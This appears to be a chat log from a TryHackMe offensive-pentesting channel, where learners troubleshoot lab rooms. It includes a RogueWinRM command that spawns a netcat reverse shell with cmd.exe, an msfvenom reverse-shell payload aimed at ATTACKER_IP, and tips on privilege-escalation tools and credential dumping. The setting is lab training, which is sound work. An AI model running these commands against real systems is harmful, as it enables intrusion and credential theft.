C:\Users\bruce>.\RogueWinRM.exe -p C:\Users\bruce\nc64.exe -a "IP 4444 -e cmd.exe"
.\RogueWinRM.exe -p C:\Users\bruce\nc64.exe -a "IP 4444 -e cmd.exe"
.\RogueWinRM.exe -p C:\Users\bruce\nc64.exe -a "IP 4444 -e cmd.exe"
Listening for connection on port 5985 ....
BITS triggered!
Error: No Authenticaton received... negotiator->authResult != -1
Hi guys and ladies. Is there someone who can explain this?
Try searching less specifically, there may be another exploit that is valid for that version but doesn't have the exact version number 1.3.5 in the title
Any help on this? I also tried it with PowerSploit but still can't figure it out. How can I do it without metasploit.
Hi, could anyone help me on this
So in "Windows Privilege" (Jr. Path Room) section "Abusing Service Misconfigurations > Insecure Permissions on Service Executable" to get a shell we are told to use the command
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe
This will create a service executable to get a shell.
Now I am doing the "HackPark" room, which has the same vulnerability for priv escalation, but when I use the above command I did not get the shell and had to change "-f exe-service" to "-f exe". What difference does this make? (Like, I know one is a service executable and the other a standard exe.) Cause our .exe will be executed by the Admin anyway, so what difference do both these options make?
I'm in the Breaching Active Directory Room (https://tryhackme.com/room/breachingad), and on the left it says "3 days of access left". Does this mean that the room will disappear from the Offensive Pentesting path soon?
no, users are just rotated out every few days to weed out the inactive ones and lessen the load on the networks, you can just rejoin and won't lose any progress
Great! Thanks!
Gave +1 Rep to @dense mist
you're welcome 🙂
Hi, I'm in the Daily Bugle room. I searched how I can find the version of Joomla but I didn't find it. I have tried to look at the source code and get a request with Burp to see if I can see something
Can someone help me pls?
I don't want to see a video or something that shows me the answer, just help me so I can be headed in the right direction
Hello guys and ladies.
Is there guidance on how to choose Metasploit/Msfvenom payloads? I mean, for example, there were a few hundred reverse_tcp payloads in both, so which one should I choose? All the time in rooms we choose Windows or Linux reverse_tcp with regard to architecture, but there are a lot more. When should I use them?
This will help: https://www.revshells.com/
Or Kali's built-in MSF payload creator: msfpc
Make sure to understand the difference between **staged** and **stageless** payloads,
and the difference between Meterpreter and a normal TCP reverse shell
Try out SweetPotato, the latest potato method
This is the part of my writeup from jr Path room
Thanks, will try it out.
Gave +1 Rep to @willow mauve
I'll take my words back, actually the latest Potato in public is **GodPotato**
https://github.com/BeichenDream/GodPotato
The issue I encountered using SweetPotato was that it cannot pass arguments; I had to write a batch file and put it on the target disk to get a PowerShell reverse shell back
GodPotato will solve that issue, plus it supports almost any Windows OS
Thank you for the resource it will help me a lot with payload creation
Gave +1 Rep to @willow mauve
Hi guys and ladies. Useful hint for the Game Zone room: check the SSL flag in the exploit when you go for privilege escalation with Metasploit.
anyone having problems with the meterpreter session dying in the steelmountain room or it's just me?
I am doing blue and my machine is lagging as hell
Hi,
I have an issue on Blue
I managed to get a full token for SYSTEM,
but got stuck at dumping the system hive
It just halts there forever
Passed Steel Mountain a few days ago and it was OK. Do you know how to reproduce it?
Hi, I was doing the Steel Mountain room.
The Meterpreter session is not created.
Can someone help
The error is this -> [!] This exploit may require manual cleanup of '%TEMP%\ZvrZcaR.vbs' on the target
Did you do it in THM Attackbox or in your Kali Machine?
Ping @dreamy tulip please
@sturdy swallow I personally prefer to use openVPN and my kali box.
Okay
@willow mauve Sorry I'm at work I don't have my personal laptop and my notes about this Blue room. Anyway if I remember correctly System isn't the full power account, you have to find (ps) a process with full power like lsass.exe. So find the process id with a full power process and then migrate to that process (migrate PID in meterpreter), at this point you should have complete access and hashdump will work.
Thanks for helping out. I was doing the challenge with Living off the Land only though; I finally gave up, then used mimikatz, and it's working fine
Gave +1 Rep to @rancid sinew
I tried again and reg save system worked, seems like it was the machine's server issue yesterday...
I continued the room today, and it looks like the machine is working just fine today. Don't know what the problem with the drops was yesterday
Hi,
I have a question,
is there a best powershell revshell apart from [Nishang, HoaxShell, metasploit revshell, Powershell Empire]?
I mainly use ConPtyShell for a fully interactive shell, but it's not working on machine: Alfred
My winPEAS is failing on the machine HackPark,
Nvm, I'll just use the release from 2022
Hey Folks, I was doing this machine, Relevant
I found a straight vuln with msfconsole, but when I configure it using msf and try to exploit, it does not create a session for me. Can anyone help me with what's going on in the AttackBox?
Hi there. From my experience with rooms, if I found a straight vuln, tried to exploit it and got an exception on session creation, it was either not vulnerable in this case or a misconfiguration of the exploit. For example, in one of the rooms I faced the issue of session creation and managed to fix it. It was the SSL flag set to true by default with no need for it.
cool, had thought it that way. was lazy to try the longer route out 😅
Why does it say 1 day of access left? Yesterday it was saying 3 days left. What does this mean?
For how long have you ppl been learning about pentesting and hacking
Pls let me know
New to this
U know
The room says you don't need Metasploit. Try exploiting the vulnerability without it and it should work fine.
It's to prevent idle instances
After that time, you'll likely be assigned to a new instance of the network (assuming you go back to it)
I have a problem in the Internal room. I can visit the website at http://ip/blog, but when I click on a link in this blog, like the log in page or comments feed, I get a Firefox error page "server not found" (I have restarted the machine 5 times)
DM
can you check if it is redirecting towards a domain (sample.thm) and you do not have that mapped in your /etc/hosts file?
Hi everyone,
I don't understand something,
Task 3: Privilege escalation
I have some issues when I run the script PowerUp.ps1,
I can't write "Invoke-AllChecks" after running the script, I have hundreds of errors
(I'm on the AttackBox)
The first time I ran the script it was at C:\Users\bill\desktop
and the second time at C:\temp
I have the same issues and I don't understand why
Can someone help me?
thanks a lot
Did you make sure to run ". ./PowerUp.ps1" with the "." in the beginning? That "." means "include the file into this PowerShell instance", and only afterwards can you run the command. It's a bit confusing because that extra "." is easily overlooked
Yes I did:
There is something I did wrong, but for now I can't see it
I think you didn’t download the right file, you may have downloaded the github page instead of the file itself
That is a non-breaking space in HTML and shouldn't occur in the PS script
Hm, wget https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1 doesn't download the script but the page instead?
Hey guys! In the room "exploitingad", I have a problem that maybe other people are also having.
None of the SSH credentials connect to execute Task 5.
Anyone else with the same problem?
Same problem with the AttackBox
Click on raw and then wget that
Thanks a lot
Question on networks: I just entered the room because I finished the AD basics room, and I am greeted with this message:
Are those 3 days already counting?
Or will the countdown start once I start the network the first time?
I did not touch anything yet
You’ll just get removed from the network and can rejoin after the 3 days, it’s just to clear up idle instances
You don’t lose access or anything, only your progress on the active machines
ah okay
Can anyone help me with the Hacking with PowerShell room? It is the Cmdlet [Task 3] and I tried out a lot of different commands but nothing seems to work. Is the room maybe buggy? I have seen quite a few questions about this task but no answers [at least they don't work for me]. For example: Get-Command | Where-Object -Property CommandType -eq Cmdlet | measure ------> 9674
Help!
I have got a virtual machine running Linux which requires a username and password to log into and hosts a website.
I have no idea how I can break into the machine without credentials.
I have tried multiple tools for vulnerability scanning and exploiting, but the machine is stopping probes. I am at a blind spot.
Please help me in getting access.
Is this part of the tryhackme offensive pentesting path?
@keen iris No Sir.
I am working on it independently. I need help.
Where did you get the virtual machine?
One of my friends gave it to me for practice.
Please ask them for help then
anyone?
This channel is for the tryhackme offensive pen testing path
I understand james.
At least tell me if there is a possibility of what I am asking?
Is it doable?
Without really knowing the origin of the VM, all we can do is give you wild guesses. When your friend gave you the VM, did he/she give you any clues? Is it metasploitable? DVWA?
No, no. It's just a Linux machine using
LAMP TurnKey GNU/Linux 16.0 Debian 10/buster
Same problem, stuck with a single question
Hey guys and ladies.
For the room Relevant, the description said that nothing requires Metasploit.
I just wonder how you set up a listener for that room?
Have you tried netcat?
I tried but why should I use netcat instead of meterpreter?
Wouldn't hurt knowing multiple ways of doing stuff.
Because you might want to take the OSCP exam one day (It's not allowed to use meterpreter in the EXAM)
The room is good practice for manual penetration testing and writing a report in OSCP's required format. Check this out - https://github.com/noraj/OSCP-Exam-Report-Template-Markdown
@willow mauve thanks, I'll check
Gave +1 Rep to @willow mauve
Same for me, always getting 9674 and submitting gives an incorrect answer... help anyone?
Same, it might be a bug in the system
Will they fix it?
I'm having an issue with Hacking with PowerShell Task 3: question 3 on cmdlets is not accepting the answer. Does anyone have the same issue?
It worked with 9673
Yes they will
Powershell room is so scuffed rn holy
Hey guys, I have a problem. I'm in the room Breaching Active Directory, and when I'm trying to connect from my VM it's not resolving the IP. I did connect once, but after a while it disconnected again, so help please
Can you cat /etc/resolv.conf?
Yeah, I did it
what did it say?